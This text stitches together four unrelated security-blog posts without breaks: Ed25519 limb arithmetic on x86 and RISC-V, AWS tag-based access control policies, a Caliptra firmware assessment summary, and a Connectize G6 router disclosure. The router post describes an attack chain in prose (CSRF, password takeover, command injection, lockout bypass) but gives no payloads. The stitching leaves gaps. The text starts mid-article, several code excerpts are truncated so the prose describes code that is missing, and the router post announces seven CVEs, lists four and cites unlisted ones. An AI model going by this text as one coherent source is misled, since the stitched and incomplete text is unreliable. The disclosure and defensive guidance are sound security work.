When Ed25519 signatures were invented, in 2011, the Intel CPUs du jour (Intel “Westmere” core) were not very good at carry propagation; they certainly supported the ADC opcode, but with a relatively high latency (2 cycles), and that made the classical code somewhat slow. The use of 51-bit limbs allowed a different code, which, in curve25519-dalek’s serial backend, looks like this:
let b1_19 = b[1] * 19;
let b2_19 = b[2] * 19;
let b3_19 = b[3] * 19;
let b4_19 = b[4] * 19;
This code excerpt computes the result over five limbs which can now range over close to 128 bits, and some extra high part propagation (not shown above) is needed to shrink limbs down to 51 bits or so. As we see here, there are now 25 individual multiplications (the m() function), since there are five limbs per input. There still are ADC opcodes in there! They are somewhat hidden behind the additions: these additions are over Rust’s u128 type, a 128-bit integer type that internally uses two registers, so that each addition implies one ADC opcode. However, these carry propagations can occur mostly in parallel (there are five independent dependency chains here), and that maps well to the abilities of a Westmere core. On such cores, the “serial” backend is faster than crrl’s m64. However, in later x86 CPUs from Intel (starting with the Haswell core), support for add-with-carry opcodes was substantially improved, and the classical method with 64-bit limbs again gained the upper hand. This was already noticed by Nath and Sarkar in 2018 and this explains why crrl’s m64 backend, on our x86 test system, is faster than curve25519-dalek’s serial and fiat backends, and even a bit faster than the AVX2-powered simd backend.
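To make the 25-multiplication structure concrete, here is a self-contained Rust sketch of a full 5×51-bit limb multiplication modulo 2^255 - 19 in the same spirit (my own simplified version, assuming limbs of at most ~52 bits; the real backends keep tighter bounds and organize the reduction somewhat differently):

```rust
fn m(x: u64, y: u64) -> u128 {
    (x as u128) * (y as u128)
}

fn mul51(a: [u64; 5], b: [u64; 5]) -> [u64; 5] {
    // Pre-multiplied limbs for the reduction: 2^255 = 19 (mod 2^255 - 19),
    // so product limbs 5..8 wrap around to limbs 0..3, multiplied by 19.
    let b1_19 = b[1] * 19;
    let b2_19 = b[2] * 19;
    let b3_19 = b[3] * 19;
    let b4_19 = b[4] * 19;

    // The 25 partial products, gathered into five 128-bit accumulators.
    let c: [u128; 5] = [
        m(a[0], b[0]) + m(a[4], b1_19) + m(a[3], b2_19) + m(a[2], b3_19) + m(a[1], b4_19),
        m(a[1], b[0]) + m(a[0], b[1]) + m(a[4], b2_19) + m(a[3], b3_19) + m(a[2], b4_19),
        m(a[2], b[0]) + m(a[1], b[1]) + m(a[0], b[2]) + m(a[4], b3_19) + m(a[3], b4_19),
        m(a[3], b[0]) + m(a[2], b[1]) + m(a[1], b[2]) + m(a[0], b[3]) + m(a[4], b4_19),
        m(a[4], b[0]) + m(a[3], b[1]) + m(a[2], b[2]) + m(a[1], b[3]) + m(a[0], b[4]),
    ];

    // Shrink the accumulators back down to ~51-bit limbs (partial reduction).
    const MASK: u64 = (1u64 << 51) - 1;
    let mut out = [0u64; 5];
    let mut carry: u128 = 0;
    for i in 0..5 {
        let t = c[i] + carry;
        out[i] = (t as u64) & MASK;
        carry = t >> 51;
    }
    // The carry out of the top limb wraps around, multiplied by 19.
    out[0] += (carry as u64) * 19;
    out
}
```

Each accumulator holds one output limb plus the wrapped-around contributions; note that the five accumulators are fully independent until the final propagation, which is exactly what gave the representation its advantage on Westmere-class cores.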
RISC-V
Now enters the RISC-V platform. RISC-V is an open architecture which has been designed with what can be viewed as “pure RISC philosophy”, with a much reduced instruction set. It is inspired by the older DEC Alpha, including in particular a large number of integer registers (32), one of which is hardwired to the value zero, and, most notably, no carry flag at all. An “add-with-carry” operation, which adds together two 64-bit inputs x and y and an input carry c, and outputs a 64-bit result z and an output carry d, now requires no fewer than five instructions:
Add x and y, into z (ADD).
Compare z to x (SLTU): if z is strictly lower, then the addition “wrapped around”; the comparison output (0 or 1) is written into d.
Add c to z (ADD).
Compare z to c (SLTU) for another potential “wrap around”, with a 0 or 1 value written into another register t.
Add t to d (ADD).
(I cannot prove that it is not doable in fewer RISC-V instructions; if there is a better solution please tell me.)
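In portable Rust, the five-step sequence above can be sketched as follows (my own illustration of the pattern, not crrl’s actual code; on RISC-V a compiler should lower this to essentially the ADD/SLTU sequence described):

```rust
// z = x + y + c (with c in {0, 1}); returns (z, output carry d).
fn adc(x: u64, y: u64, c: u64) -> (u64, u64) {
    let z = x.wrapping_add(y);   // ADD
    let d = (z < x) as u64;      // SLTU: did x + y wrap around?
    let z = z.wrapping_add(c);   // ADD
    let t = (z < c) as u64;      // SLTU: did adding c wrap around?
    (z, d + t)                   // ADD
}
```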
Thus, the add-with-carry is not only a high-latency sequence; it also requires quite a few instructions, so that instruction throughput may become a bottleneck. Our test platform (SiFive U74 core) is not well documented, but some cursory tests show the following:
Multiplication opcodes have a throughput of one per cycle, and a latency of three cycles (this seems constant-time). As per the RISC-V specification (“M” extension), a 64×64 multiplication with a 128-bit result requires two separate opcodes (MUL returns the low 64 bits of the result, MULHU returns the high 64 bits). There is a recommended code sequence for when the two opcodes relate to the same operands, but this does not appear to be leveraged by this particular CPU.
For “simple” operations such as ADD or SLTU, the CPU may schedule up to two instructions in the same cycle, but the exact conditions for this to happen are unclear, and each instruction still has a 1-cycle latency.
Under such conditions, a 5-instruction add-with-carry will need a minimum of 2.5 cycles (in terms of throughput). The main output (z) is available with a latency of 2 cycles, but the output carry has a latency of 4 cycles. A “partial” add-with-carry with no input carry is cheaper (an ADD and a SLTU), and so is an add-with-carry with no output carry (two ADDs), but these are still relatively expensive. The high latency is similar to the Westmere situation, but the throughput cost is new. For that RISC-V platform, we need to avoid not only long dependency chains of carry propagation, but we should also endeavour to do fewer carry propagations. Another operation which is similarly expensive is the split of a 115-bit value (held in a 128-bit variable) into a low part (51 bits) and a high part (64 bits). The straightforward Rust code looks like this (from curve25519-dalek):
let carry: u64 = (c4 >> 51) as u64;
out[4] = (c4 as u64) & LOW_51_BIT_MASK;
On x86, the 128-bit value is held in two registers; the low part is a simple bitwise AND with a constant, and the high part is extracted with a single SHLD opcode, that can extract a chunk out of the concatenation of two input registers. On RISC-V, there is no shift opcode with two input registers (not counting the shift count); instead, the extraction of the high part (called carry in the code excerpt above) requires three instructions: two single-register shifts (SHR, SHL) and one bitwise OR to combine the results.
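As a Rust illustration (my own, not taken from either library), the three-instruction RISC-V extraction of the high part, operating on the two 64-bit registers that hold the 128-bit value, amounts to:

```rust
// Extract bits 51.. of a 128-bit value whose halves sit in two 64-bit
// registers: two single-register shifts plus a bitwise OR (SRL, SLL, OR).
fn extract_high(lo: u64, hi: u64) -> u64 {
    (lo >> 51) | (hi << 13)
}
```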
In order to yield better performance on RISC-V, the crrl m51 backend does things a bit differently:
let a0 = a0 << 6;
let b0 = b0 << 7;
// ...
let (c00, h00) = umull(a0, b0);
let d0 = c00 >> 13;
Here, the input limbs are pre-shifted (by 6 or 7 bits) so that the products are shifted by 13 bits. In that case, the boundary between the low and high parts falls exactly on the boundary between the two registers that receive the multiplication result; the extraction of the high part becomes free! The low part is obtained with a single opcode (a right shift of the low register by 13 bits). Moreover, instead of performing 128-bit additions, crrl’s m51 code adds the low and high parts separately:
let d0 = c00 >> 13;
let d1 = (c01 >> 13) + (c10 >> 13);
let d2 = (c02 >> 13) + (c11 >> 13) + (c20 >> 13);
// ...
let h0 = h00;
let h1 = h01 + h10;
let h2 = h02 + h11 + h20;
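A minimal sketch of the pre-shift trick for a single limb product (my own illustration; it assumes the inputs are small enough that the shifts by 6 and 7 bits do not overflow, as is the case for ~51-bit limbs):

```rust
// Returns (low 51 bits, high part) of the true product a0*b0. Because the
// operands are pre-shifted by 6 and 7 bits, the product is shifted by 13,
// and the 51-bit split boundary of the true product lands exactly on the
// 64-bit register boundary: the high part is just the high register, free.
fn mul_split51(a0: u64, b0: u64) -> (u64, u64) {
    let z = ((a0 << 6) as u128) * ((b0 << 7) as u128);
    let c00 = z as u64;          // low register of the shifted product
    let h00 = (z >> 64) as u64;  // high register = bits 51.. of a0*b0
    (c00 >> 13, h00)
}
```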
In that way, all add-with-carry operations are avoided. This makes crrl’s m51 code somewhat slower than curve25519-dalek’s serial backend on x86, but it considerably improves performance on RISC-V.
Conclusion
The discussion above is about a fairly technical point. In the grand scheme of things, the differences in performance between the various implementation strategies are not great; there are not many usage contexts where a speed difference of less than 30% in computing or verifying Ed25519 signatures has any relevance to overall application performance. But, insofar as such things matter, the following points are to be remembered:
Modern large CPUs (for laptops and servers) are good at handling add-with-carry, and for them the classical “64-bit limbs” format tends to be the fastest.
Some smaller CPUs will be happier with 51-bit limbs. However, there is no one-size-fits-all implementation strategy: for some CPUs, the main issue is the latency of add-with-carry, while for some others, in particular RISC-V systems, the instruction throughput is the bottleneck.
AWS allows tags, arbitrary key-value pairs, to be assigned to many resources. Tags can be used to categorize resources however you like. Some examples:
In an account holding multiple applications, a tag called “application” might be used to denote which application is associated with each resource.
A tag called “stage” might be used to separate resources belonging to alpha, beta, and production stages within a single account.
A tag called “cost-center” might be used to indicate which business unit is responsible for a resource. AWS’ billing can break down bills by tag, allowing customers to allocate costs from a shared account to the appropriate budgets.
Once you have tagged your resources, you can search and filter based on tags. That’s not very interesting from a security perspective. Far more interesting is using tags to implement attribute-based access control (ABAC).
Attribute-Based Access Control
The “normal” AWS authorization scheme is known as Role-Based Access Control (RBAC): you define “roles” corresponding to service or job functions (implemented as IAM Users or Roles) and assign them the privileges necessary for those functions. A disadvantage of this scheme is that when you add new resources to your environment, the privileges assigned to your principals may need to be modified. This doesn’t scale particularly well with large numbers of resources. Using resource-based permission policies rather than identity-based permission policies can help with this, but that doesn’t scale well with large numbers of principals (especially since AWS doesn’t allow permissions to be granted to groups using resource-based permission policies). Also, not all resources support resource-based permission policies.
An alternative authorization scheme is to assign tags to principals and resources then grant permissions based on the combinations of principal and resource tags. For instance, all principals tagged as belonging to project QuarkEagle can be allowed to access resources also tagged as belonging to project QuarkEagle, while principals tagged with project CrunchyNugget can only access resources also tagged CrunchyNugget. This approach isn’t suitable for all scenarios but can result in significantly fewer and smaller permission policies that rarely need to be updated even as new principals and resources are added to accounts. This scheme is known as “attribute-based access control” (ABAC) or “tag-based access control” (TBAC), depending on the source.
In practice, you’re not likely to want a “pure” ABAC environment: most ABAC deployments will combine it with elements of RBAC.
How AWS implements ABAC
Apart from tags themselves, there are no new fundamental concepts in AWS for ABAC. You still have principals and resources with identity-based and resource-based permission policies. However, instead of having a lot of specifics in the resource and principal fields, an ABAC permission policy will have wildcards in those fields with the real logic implemented using conditions. There are four main condition keys that relate to tagging:
aws:ResourceTag/<tag-name>: control access based on the values of tags attached to the resource being accessed.
aws:RequestTag/<tag-name>: control the tag values that can be assigned to or removed from resources.
aws:TagKeys: control access based on the tag keys specified in a request. This is a multi-valued condition key.
aws:PrincipalTag/<tag-name>: control access based on the values of tags attached to the principal making the API request.
Some examples are in order to clarify how these condition keys are used.
If a principal is only permitted to publish messages to SNS Topics belonging to project QuarkEagle, then it might have this permission policy statement:
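A statement to that effect might look like the following (a sketch consistent with the surrounding description, not the original post’s exact policy):

```json
{
  "Effect": "Allow",
  "Action": "sns:Publish",
  "Resource": "*",
  "Condition": {
    "StringEquals": { "aws:ResourceTag/project": "QuarkEagle" }
  }
}
```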
This allows your principal to publish to any SNS Topic, so long as that Topic has a tag named “project” whose value is “QuarkEagle”. If you want to go a step further, you could tag your principals with their associated projects and then use this permission policy statement instead:
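Such a statement might look like this (again a sketch matching the description, using the ${aws:PrincipalTag/project} policy variable):

```json
{
  "Effect": "Allow",
  "Action": "sns:Publish",
  "Resource": "*",
  "Condition": {
    "StringEquals": { "aws:ResourceTag/project": "${aws:PrincipalTag/project}" }
  }
}
```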
Now any principal that has a tag named “project” with the value “QuarkEagle” can publish to any SNS topic whose “project” tag is also “QuarkEagle” and any principal whose “project” tag is “CrunchyNugget” can publish to any topic that is also tagged “CrunchyNugget” — no need for permission policies that know about every tag value in use.
If your principals can create and delete SNS Topics, then you should make sure that they can only create properly tagged ones and can only delete ones with the proper tags. Similarly, if you allow your principals to set or unset tags, then you probably don’t want to allow them to change the “project” tag values on their resources. To enforce that, you might give them permission policy statements like this:
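A sketch of such a policy, reconstructed from the three-statement description that follows (the layout and exact condition grouping are mine):

```json
[
  {
    "Effect": "Allow",
    "Action": ["sns:CreateTopic", "sns:TagResource"],
    "Resource": "*",
    "Condition": {
      "StringEquals": {
        "aws:RequestTag/project": "${aws:PrincipalTag/project}",
        "aws:ResourceTag/project": "${aws:PrincipalTag/project}"
      }
    }
  },
  {
    "Effect": "Allow",
    "Action": "sns:DeleteTopic",
    "Resource": "*",
    "Condition": {
      "StringEquals": { "aws:ResourceTag/project": "${aws:PrincipalTag/project}" }
    }
  },
  {
    "Effect": "Allow",
    "Action": ["sns:TagResource", "sns:UntagResource"],
    "Resource": "*",
    "Condition": {
      "StringEquals": { "aws:ResourceTag/project": "${aws:PrincipalTag/project}" },
      "ForAllValues:StringNotEquals": { "aws:TagKeys": ["project"] }
    }
  }
]
```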
The first statement permits the principal to create SNS Topics so long as each new Topic’s “project” tag has the same value as the principal’s “project” tag. Setting a tag during resource creation requires the same sns:TagResource permission as setting one explicitly later, so we grant permission for both actions. During resource creation, the condition key aws:ResourceTag is set to the value specified for the tag to be created, so the two condition checks are very similar, but both are necessary to prevent the principal from using sns:TagResource in unintended ways:
Without the check against aws:RequestTag, the principal would be able to assign arbitrary tag values to existing Topics that currently share the principal’s “project” tag (potentially giving away those Topics to someone else; this could allow one principal to elevate the privileges of another, useful in a scenario where someone has compromised two different principals, neither of which can do what the attacker wants).
Omitting the aws:ResourceTag check would allow the principal to re-tag arbitrary existing Topics to its “project” tag value (allowing it to take control of other Topics and likely elevating its privileges if the principal has other permissions allowing it to read from or write to Topics that share its “project” tag).
The second statement permits the principal to delete SNS Topics whose “project” tag has the same value as the caller’s “project” tag.
The third statement enables the principal to change the tags on existing SNS Topics. The first condition, using aws:ResourceTag, requires that the target Topic’s “project” tag have the same value as the caller’s “project” tag. The second condition, using aws:TagKeys, prevents the caller from changing the value of the Topic’s “project” tag. Note that due to the first statement, it’s still possible for the principal to set a Topic’s “project” tag, but only if the value is the caller’s “project” tag.
ABAC permissions policies are easy to get wrong. Even Amazon has difficulty with them: AWS’ public documentation contains a number of example permission policies similar to the first statement above that do not contain the “StringEquals”: { “aws:ResourceTag/project”: “${aws:PrincipalTag/project}” } condition. Make sure that any ABAC permission policies that you write or review cover all scenarios.
It’s also important that your principals can’t change the “project” tags on themselves. If you need to allow your principals to call iam:TagUser and iam:UntagUser (or their equivalents for Roles), then you should use similar permission policies to prevent them from removing or changing the values of their “project” tags.
If you want to enforce some order on what tags are applied, then you can use a permission policy statement such as the following to prevent principals from setting any tags other than “department”, “project”, and “stage” on SNS Topics:
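One way to express that, sketched with the multi-valued aws:TagKeys condition key and the ForAllValues set operator (which requires every tag key in the request to be in the listed set); as an Allow statement, it constrains what this particular grant permits:

```json
{
  "Effect": "Allow",
  "Action": ["sns:TagResource", "sns:UntagResource"],
  "Resource": "*",
  "Condition": {
    "ForAllValues:StringEquals": {
      "aws:TagKeys": ["department", "project", "stage"]
    }
  }
}
```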
A similar permission policy statement employing aws:RequestTag/… can be used to control the values that may be assigned to tags.
Some services offer a condition key that can be used to make a permission policy statement apply only during resource creation (such as EC2’s ec2:CreateAction); using such a condition in your Policies can make them simpler and easier to understand. For instance, the following permission statement allows a principal to create tagged EC2 resources without allowing any weird ec2:CreateTags abuses:
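A sketch of such a pair of statements (the specific resource-creation actions chosen here are my own illustration, and the resource scoping is deliberately simplified):

```json
[
  {
    "Effect": "Allow",
    "Action": ["ec2:RunInstances", "ec2:CreateVolume", "ec2:CreateSecurityGroup"],
    "Resource": "*",
    "Condition": {
      "StringEquals": { "aws:RequestTag/project": "${aws:PrincipalTag/project}" }
    }
  },
  {
    "Effect": "Allow",
    "Action": "ec2:CreateTags",
    "Resource": "*",
    "Condition": {
      "StringEquals": {
        "ec2:CreateAction": ["RunInstances", "CreateVolume", "CreateSecurityGroup"]
      }
    }
  }
]
```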
The first statement permits the caller to create a few different EC2 resources so long as they have the same “project” tag value as the caller. Actually setting that tag, even during resource creation, requires a permission for ec2:CreateTags, so the second statement allows the caller to create tags only from those resource-creation API actions. However, this approach has its own flaws: EC2 considers ec2:CreateTags to be a resource-creation action, so make sure that any wildcards that you use in the ec2:CreateAction condition check don’t match ec2:CreateTags.
With proper use of tagging, combined with separate VPCs, it may be possible to put separate applications and separate stages of each application in the same account without allowing, for instance, beta principals to access prod data. Not that I’d recommend this approach: getting the tagging right is a lot of work (and there are many gotchas; see below). If you’re building a new application, it’s usually safer (and easier) to just use separate accounts for each application and stage with cross-account access via Role assumption and VPC peering as needed. But it’s worth considering for big complicated accounts with access control problems: it may be less work to implement ABAC on top of existing applications than it is to disentangle a giant messy account.
Manipulating tags
AWS services that support tagging have API actions to add and remove tags from resources and to list the tags on a resource. Tagging support was added to many AWS services well after they were first released and ABAC support was grafted on later still. As a result, the implementation of tagging isn’t consistent between services.
The most common patterns for API action names are:
TagResource / UntagResource / ListTagsForResource: a single set of API actions for all taggable resources in the service. One of the arguments is a resource ARN; if the service supports more than one type of resource, it figures out the resource type and what to do from there based on the ARN. One or more tags can be set or removed at once. This seems to be the most common pattern, used by Lambda, SNS, DynamoDB, and other services. However, there is a lot of variation in the name of the tag-listing operation: sns:ListTagsForResource, lambda:ListTags, dynamodb:ListTagsOfResource, apigateway:GetTags, kms:ListResourceTags, etc. Some services don’t have a tag-listing operation at all, allowing tags to be retrieved only using other resource-description API actions (e.g., Secrets Manager). There are also several variations on this pattern:
AddTagsToResource / RemoveTagsFromResource / ListTagsForResource: these API actions tend to work just like in the above case only with different names. This pattern is used by RDS and SSM.
AddTags / RemoveTags / ListTags, used by CloudTrail.
CreateTags / DeleteTags / DescribeTags, used by EC2 and Workspaces. In EC2’s case, ec2:DescribeTags doesn’t operate on a single resource but rather returns information about every resource in EC2 (with optional filters to limit the response to certain specific resources, resource types, etc.).
Tag<Resource> / Untag<Resource> / List<Resource>Tags: separate sets of API actions for each taggable resource. You need to call the correct API action for the type of resource that you want to tag and provide a resource name or ARN. As above, you can generally set or remove one or more tags at once. This pattern is followed by IAM and SQS (some specific examples: iam:TagUser, sqs:UntagQueue, iam:ListRoleTags). Certificate Manager uses a variation on this pattern: acm:AddTagsToCertificate / acm:RemoveTagsFromCertificate / acm:ListTagsForCertificate.
Most resource-creation API actions allow tags to be assigned during resource creation. Assigning a tag this way requires the permission for the tag-setting API action in addition to the resource-creation API action. For instance, to create an SNS Topic, I need permission for the action “sns:CreateTopic“. If I set a tag on a Topic while creating it, then I also need permission for the action “sns:TagResource” even if I never directly call that API action. However, there may still be some resources that support tagging but cannot be tagged at creation or cannot be tagged when created using CloudFormation.
The syntax for setting tags using the AWS CLI also differs between services. Most services' resource-creation and tagging API actions use a "--tags" command-line argument followed by a list of tags to set, but how that list is formatted depends on the service. Some services (including SQS and Lambda) expect "--tags project=QuarkEagle,stage=beta" while others (such as SNS and SSM) expect an argument of the form "--tags Key=project,Value=QuarkEagle Key=stage,Value=beta". EC2 is an exception; during resource creation, it uses a more elaborate form of the latter syntax: "--tag-specifications 'ResourceType=security-group,Tags=[{Key=project,Value=QuarkEagle},{Key=stage,Value=beta}]'".
If you were thinking that it would be really nice for AWS to provide a unified tagging API, you're not alone. AWS Resource Groups has a tagging API that can operate on most AWS services that support tagging. Besides providing a generic interface to tagging and untagging, this service also provides ways to retrieve all tag keys and values currently in use by an account and to query resources by tag across multiple services. Using the AWS CLI, you can run "aws resourcegroupstaggingapi tag-resources …" to apply tags to arbitrary resources. To do this, you need both a "tag:TagResources" permission and a tagging permission for the resource that you are trying to tag. Untagging is similar. The following is a minimal permission policy to allow a principal to apply tags to a specific SNS Topic (resource constraints aren't supported on the tag:TagResources permission because the resources are not in the Resource Groups service):
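A minimal policy along these lines might look like the following sketch (the account ID, region, and Topic name are hypothetical placeholders); note the wildcard Resource on tag:TagResources, since resource constraints aren't supported there:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "tag:TagResources",
      "Resource": "*"
    },
    {
      "Effect": "Allow",
      "Action": "sns:TagResource",
      "Resource": "arn:aws:sns:us-east-1:111122223333:example-topic"
    }
  ]
}
```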
S3 is the special snowflake; there's a reason why I didn't use it for my examples above. While most AWS services have API actions that add or remove individual tags, the S3 tagging API operates on the entire tag set at once: s3:PutObjectTagging and s3:PutBucketTagging replace the full set of tags on the target resource with the given set, while the DeleteObjectTagging and DeleteBucketTagging operations remove all tags from the target resource. If an object has the tags "application", "stage", and "owner" and you want to change the value of "owner", then your call to s3:PutObjectTagging needs to set the "owner" tag to its new value and the "application" and "stage" tags to their current values in order not to lose them. Tags can be retrieved using s3:GetObjectTagging and s3:GetBucketTagging. Unfortunately, the Resource Groups Tagging API does not support objects in S3, so it does not provide a work-around for S3's unusual tagging implementation.
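The resulting read-modify-write dance can be sketched in Python. This pure function builds the full tag set that a PutObjectTagging request would need to carry (the function name is illustrative, not part of any AWS SDK):

```python
def build_put_tagging_set(current_tags: dict, changes: dict) -> list:
    """Merge desired tag changes into the existing tag set.

    PutObjectTagging replaces the object's ENTIRE tag set, so any tag
    omitted from the request is silently deleted. To change one tag,
    we must re-send all of the others with their current values.
    """
    merged = dict(current_tags)   # start from the existing tags
    merged.update(changes)        # apply only the changes we want
    # The S3 API expects a list of {"Key": ..., "Value": ...} structures.
    return [{"Key": k, "Value": v} for k, v in sorted(merged.items())]

# Changing only "owner" still re-sends "application" and "stage":
existing = {"application": "billing", "stage": "prod", "owner": "alice"}
tag_set = build_put_tagging_set(existing, {"owner": "bob"})
```

In a real client you would first fetch the current tags with GetObjectTagging, then pass the merged list to PutObjectTagging.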
To make the S3 case even more complicated, both Buckets and objects can be tagged but S3 only supports ABAC on objects. Even that support is incomplete: ABAC is not supported for s3:PutObject, s3:DeleteObject, or s3:DeleteObjectVersion calls. S3 also doesn’t support the normal aws:ResourceTag, aws:RequestTag, and aws:TagKeys condition keys at all: you must use S3-specific condition keys:
s3:ExistingObjectTag/<tag-name>: control access based on the values of tags attached to objects.
s3:RequestObjectTag/<tag-name>: control the tag values that can be assigned to or removed from objects.
s3:RequestObjectTagKeys: control access based on the tag keys specified in a request. This is a multi-valued condition key.
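As a sketch of how the first of these keys is used (the bucket name and tag value are hypothetical placeholders), a statement like the following would allow reading only objects tagged stage=beta:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::example-bucket/*",
      "Condition": {
        "StringEquals": { "s3:ExistingObjectTag/stage": "beta" }
      }
    }
  ]
}
```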
There may be other services with unusual tagging implementations; I haven’t checked all of them. EC2 has its own tagging condition key “ec2:ResourceTag” but that seems to be a synonym for aws:ResourceTag.
Limitations of AWS ABAC
Unfortunately, ABAC support across AWS is incomplete (though improving) and has many implementation inconsistencies across services. Quirks of AWS’ ABAC implementation include:
Some services do support tagging but don’t support ABAC; others support ABAC on only some types of resources or in some contexts. There may yet be some services that don’t support tagging at all. The following table, describing ABAC support for a number of frequently-encountered AWS services, is summarized from Amazon’s documentation:
Service: ABAC support?
EC2: Yes
S3: Partial support for objects using non-standard condition keys; no support for Buckets
Lambda: For Functions but not for other resource types
DynamoDB: No
RDS: Yes
IAM: Users and Roles only, with exceptions
Certificate Manager: Yes
Secrets Manager: Yes
KMS: Yes
CloudTrail: Yes
CloudWatch: Mostly
CloudFormation: Yes
API Gateway: Yes (though not for API authorization)
CloudFront: Yes
Route 53: No
SNS: Yes
SQS: Yes (added in fall 2022)
Details on some of those limitations:
IAM: it is not possible to limit who can pass a Role using tags on that Role. While it is tempting to try to limit overly-permissive iam:PassRole permissions by allowing principals to pass only Roles with specific tags, that won’t work.
S3: it is not possible to limit who can delete or overwrite an S3 object based on tags on that object, nor is it possible to control access to API actions that operate on Buckets using tags. S3 also doesn’t support the normal condition keys for tags, instead using its own.
CloudWatch Logs doesn’t support limitations on the tags that can be assigned to Log Groups and doesn’t support aws:ResourceTag/<tag-name> for logs:DescribeLogGroups.
As previously noted, the tagging APIs and available condition keys for tagging are not consistent, either in name or function, across all AWS services. As a result, make sure to thoroughly review or test ABAC policies, especially if they contain Deny rules based on tagging. It won’t do to attempt to restrict access to S3 objects using aws:ResourceTag/<tag-name> because that condition key won’t exist: you need to use s3:ExistingObjectTag/<tag-name>. It also won’t do to treat s3:PutObjectTagging like you do iam:TagUser in your permission policies because they work differently.
Also as noted above, AWS’ pattern of requiring a tagging permission to assign tags while creating a resource makes it altogether too easy to accidentally give principals excessive tagging permissions. Carefully review all permission policies that permit tagging during resource creation.
In most cases, tag names are case-sensitive: "Project" is a different tag than "project". However, this is not entirely consistent across services. Tags on IAM Users and Roles (though not on other IAM resources) are case-insensitive.
Some services (such as Secrets Manager) won’t let a principal change a tag if that change would prevent that principal from accessing the resource after the change. Other services (such as SNS) do not have this restriction.
There are some random bugs and missing functionality in various services. SQS doesn’t support aws:ResourceTag in resource-based permission policies. EC2 doesn’t support aws:ResourceTag checks during resource creation; you must use the EC2-specific condition key ec2:CreateAction to protect your tag-on-create permissions for EC2. CloudTrail seems to support aws:ResourceTag only after Trail creation and doesn’t seem to support aws:RequestTag or aws:TagKeys at all. There are probably a few other similar bugs out there.
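As a sketch of the EC2 workaround mentioned above (region and account ID are hypothetical placeholders), a statement like this grants ec2:CreateTags only in the context of a RunInstances call, so it cannot be used to re-tag existing instances:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "ec2:CreateTags",
      "Resource": "arn:aws:ec2:us-east-1:111122223333:instance/*",
      "Condition": {
        "StringEquals": { "ec2:CreateAction": "RunInstances" }
      }
    }
  ]
}
```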
Hopefully AWS’ ABAC support will continue to improve over time.
During August and September of 2023, Microsoft engaged NCC Group to conduct a security assessment of Caliptra v0.9.
Caliptra is an open-source silicon IP block for datacenter-focused server-class ASICs. It serves as the internal root-of-trust for both measurement and identity of a system-on-chip. The main use cases for Caliptra are to assure integrity of mutable code, to authorize firmware updates, and to support secure platform configuration and lifecycle state transitions. Notably, Caliptra also implements the TCG DICE Protection Environment, enabling other entities within the SoC to leverage the unique device identity for their own security operations.
Our evaluation of Caliptra spanned the three primary components:
ROM: The immutable mask ROM, which executes when Caliptra is brought out of reset.
First Mutable Code: Started by the ROM, the FMC is responsible for loading the runtime.
Runtime Firmware: The services that Caliptra provides to the rest of the SoC.
Microsoft furnished NCC Group with several testing objectives and focus areas for this project. These requirements were related to upholding the properties of confidentiality, integrity, and availability for the DICE Protection Environment and its security-critical assets:
Ensure that the firmware loading and authentication processes cannot be bypassed.
Review DPE signing operations for side-channel information leakage, impacting the Unique Device Secret or Composite Device Identifier.
Prevent attacks that undermine DICE initialization and external firmware measurement.
Ensure that measurements cannot be silently dropped or excluded from DPE derivations.
Determine whether an attacker can malform the DPE context tree structure.
Determine whether risks are present due to leaving cryptographic material in memory.
Under debug, DPE certificates should not chain to vendor-signed DeviceID certificates.
Assess the effectiveness of Caliptra’s exploit mitigation technologies.
Assess the soundness of the fault injection countermeasures.
The assessment identified 26 vulnerabilities, which were promptly addressed by the Caliptra team prior to the publication of this report. Read the full report here:
Since May of this year, NCC Group has been collaborating with the OCP by sharing our expertise in hardware and firmware security to support the creation of the SAFE program and the definition of its testing methodologies and reporting outputs. NCC Group is an approved SAFE Security Review Provider.
Connectize’s G6 WiFi router was found to have multiple vulnerabilities exposing its owners to potential intrusion in their local Wi-Fi network and browser. The Connectize G6 router is a general consumer Wi-Fi router with an integrated web admin interface for configuration, and is available for purchase by the general public. These vulnerabilities were discovered in firmware version 641.139.1.1256, and are believed to be present in all versions up to and including that version.
A total of seven vulnerabilities were uncovered, with links to the associated technical advisories, as well as detailed descriptions of each finding, below.
Command Injection via Ping Diagnostic Functionality (CVE-2023-24046)
Stored Cross Site Scripting using Wi-Fi Password Field (CVE-2023-24050)
Admin Panel Account Lockout and Rate Limiting Bypass (CVE-2023-24051)
Current Password Not Required When Changing Admin Password (CVE-2023-24052)
Attack Scenarios
The nature of these vulnerabilities allows a motivated attacker to perform an attack chain combining multiple of these issues, potentially leading to full unauthenticated access to the admin panel, a pivot point on the user’s home network for further attacks, and arbitrary JavaScript code execution in the victim’s browser.
Scenario 1 – Attacker Not on the Network
An attacker not present on the Wi-Fi network can obtain a foothold onto the network, as well as total admin panel compromise, via the following steps. First, the attacker sends a phishing email to the target. The email induces the victim to visit the attacker's website, which allows the attacker to send HTTP requests from the victim's browser. If the victim is logged in to the administration panel of their router, the attacker can leverage CVE-2023-24048 to send requests to the web application on the victim's behalf, effectively granting them administrative access at this time.
However, this is temporary – the attacker only has this access while the victim remains logged in to the administrative panel. The attacker's next step is to change the victim's password, guaranteeing them access to the admin panel and locking out the victim. They can perform this easily, as the current password is not required to perform this sensitive action (CVE-2023-24052).
From here, they can utilize CVE-2023-24046 to pivot their attack, as this vulnerability grants the attacker complete command line access to the router itself, and in doing so, gives the attacker a device on the victim’s network that they control. From here, they could transition to traditional network based post-exploitation attacks, such as sniffing traffic and attempting to exploit vulnerabilities on other machines in the network. Furthermore, due to the known insecure hashing algorithms used to protect the sensitive router credentials (CVE-2023-24047), they can ensure that even in the event they lose access to the admin panel, they can recover the password by checking the router’s /etc/passwd file.
Scenario 2 – Attacker on the Network
Alternatively, rather than starting with a targeted phishing attack, an attacker who already has access to the home network (such as a guest in the home) could attempt to elevate from a normal user to an administrator via brute-force password guessing.
The admin panel has an account lockout intended to prevent this – after three failed guesses, a user is informed they must wait 180 seconds before attempting another guess. However, as shown in CVE-2023-24051, the attacker can refresh the browser to reset this timer, or could use automation to send these requests without the browser pop-up's interference in the first place.
If the victim has set a strong password, this will still take a significant amount of time. However, as the router requires a minimum length of only 5 characters, rather than the industry-standard recommended minimum of 8, a weak password becomes a viable target. If the password was never changed from the default value of admin, the attacker can gain access in a single guess (CVE-2023-24049).
